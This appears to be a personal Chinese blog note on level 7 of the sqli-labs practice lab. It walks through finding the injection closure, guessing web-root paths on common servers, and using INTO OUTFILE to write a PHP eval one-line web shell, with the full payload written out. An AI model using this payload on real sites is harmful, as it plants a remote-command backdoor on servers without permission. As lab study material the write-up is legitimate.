sqli(7)
2024-09-05 21:44:14
前言
第7关 导出文件GET字符型注入
步骤OK,但是就是不能写入文件,不知是文件夹的问题还是自己操作的问题。但是确实,没有导入成功。
1. 查看闭合,看源码,发现闭合是((‘ ’));
2.查看所在位置:
@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径
但是在less7中,没有输出信息,所以我们只能盲打:
winserver的iis默认路径是c:/inetpub/wwwroot/,PHPstudy的是F:\phpStudy\PHPTutorial\WWW
linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等,
apache 就/var/www/htm,/var/www/html/htdocs
3.使用into outfile写入一句话木马,然后连接就行了。
?id=')) union select 1,2,'<?php @eval($_POST["cmd"]);?>' into outfile "路径\\间隔"--+
4.我搭建的物理机,所以没有尝试连菜刀。还有个问题就是不能写入文件,修改了文件夹属性也不行。希望后面几关可以帮助我解开疑惑。
最新文章
- mac os 如何加载 Java Native/Shared Library (.jnilib)
- UWP开发入门(二十二)——Storyboard和Animation
- android——判断网络状态
- STM32 使用 FreeRTOS过程记录
- centos6.5 tomcat开机启动
- ADO.NET笔记——使用通用数据访问
- js代码大全(里面啥都有)
- WAMP下定义wordpress固定连接出现文章页面404
- EMV标准
- JAVA的BIT数组
- asp.net 一般处理程序session 为 null
- Angularjs 实现移动端在线测评效果
- 设计模式(二) 策略模式Strategy
- postman接口测试系列:接口参数化和参数的传递
- Python之协程
- 亚马逊 amazon connect(呼叫中心)
- 5. 箭头函数_this 指向_es6 常用语法
- MongoDB安全使用指引
- 【BZOJ5300】[CQOI2018]九连环 (高精度,FFT)
- shell编程 之 引号、括号的用法总结